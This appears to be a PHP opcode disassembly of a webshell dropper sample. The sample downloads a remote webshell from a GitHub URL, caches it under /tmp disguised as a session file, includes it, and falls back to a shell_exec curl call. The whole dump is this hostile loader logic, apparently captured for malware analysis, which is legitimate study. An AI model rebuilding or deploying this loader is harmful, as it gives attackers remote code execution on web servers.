|filename:|/root/samples/temp.php
|functionname:|(null)
|numberofops:|29
|compiledvars:|!0=$URL,|!1=$TMP
|line|#*|||op|fetch|ext|return|operands
|6|0|E>|ASSIGN||||!0|,|'https%3A%2F%2Fraw.githubusercontent.com%2Fjustikail%2Fwebshell%2Fmain%2Falfav4.1-tesla.php'|
|7|1||INIT_FCALL||||'md5'|
||2||FETCH_R|global||~3|'_SERVER'|
||3||FETCH_DIM_R|||~4|~3|,|'HTTP_HOST'|
||4||SEND_VAL||||~4|
||5||DO_ICALL|||$5|
||6||CONCAT|||~6|'%2Ftmp%2Fsess_'|,|$5|
||7||CONCAT|||~7|~6|,|'.php'|
||8||ASSIGN||||!1|,|~7|
|21|9||INIT_FCALL||||'file_exists'|
||10||SEND_VAR||||!1|
||11||DO_ICALL|||$9|
||12|>|JMPZ||||$9|,|->26|
|22|13|>|INIT_FCALL||||'filesize'|
||14||SEND_VAR||||!1|
||15||DO_ICALL|||$10|
||16||IS_IDENTICAL||||$10|,|0|
||17|>|JMPZ||||~11|,|->24|
|23|18|>|INIT_FCALL||||'unlink'|
||19||SEND_VAR||||!1|
||20||DO_ICALL||||
|24|21||INIT_FCALL||||'m'|
||22||DO_FCALL||0||
||23|>|JMP||||->25|
|26|24|>|INCLUDE_OR_EVAL||||!1|,|INCLUDE|
||25|>>|JMP||||->28|
|29|26|>|INIT_FCALL||||'m'|
||27||DO_FCALL||0||
|32|28|>>|RETURN||||1|
|
|Functionm:
|filename:|/root/samples/temp.php
|functionname:|M
|numberofops:|39
|compiledvars:|!0=$FGT,|!1=$HANDLE
|line|#*|||op|fetch|ext|return|operands
|10|0|E>|BEGIN_SILENCE|||~2|
||1||INIT_FCALL||||'file_get_contents'|
||2||FETCH_R|global||~3|'GLOBALS'|
||3||FETCH_DIM_R|||~4|~3|,|'URL'|
||4||SEND_VAL||||~4|
||5||DO_ICALL|||$5|
||6||END_SILENCE||||~2|
||7||ASSIGN||||!0|,|$5|
|11|8||BOOL_NOT|||~7|!0|
||9|>|JMPZ||||~7|,|->23|
|12|10|>|INIT_FCALL||||'shell_exec'|
||11||ROPE_INIT||4|~13|'curl+-k+%24%28echo+'|
||12||FETCH_R|global||~8|'GLOBALS'|
||13||FETCH_DIM_R|||~9|~8|,|'URL'|
||14||ROPE_ADD||1|~13|~13|,|~9|
||15||ROPE_ADD||2|~13|~13|,|'%29+%3E+'|
||16||FETCH_R|global||~10|'GLOBALS'|
||17||FETCH_DIM_R|||~11|~10|,|'TMP'|
||18||ROPE_END||3|~12|~13|,|~11|
||19||SEND_VAL||||~12|
||20||DO_ICALL|||$15|
||21||ECHO||||$15|
||22|>|JMP||||->37|
|14|23|>|INIT_FCALL||||'fopen'|
||24||FETCH_R|global||~16|'GLOBALS'|
||25||FETCH_DIM_R|||~17|~16|,|'TMP'|
||26||SEND_VAL||||~17|
||27||SEND_VAL||||'w'|
||28||DO_ICALL|||$18|
||29||ASSIGN||||!1|,|$18|
|15|30||INIT_FCALL||||'fwrite'|
||31||SEND_VAR||||!1|
||32||SEND_VAR||||!0|
||33||DO_ICALL||||
|16|34||INIT_FCALL||||'fclose'|
||35||SEND_VAR||||!1|
||36||DO_ICALL||||
|18|37|>|ECHO||||'%3Cscript%3Ewindow.location%3D%22%3FLOL%22%3B%3C%2Fscript%3E'|
|19|38|>|RETURN||||null|
|
|Endoffunctionm

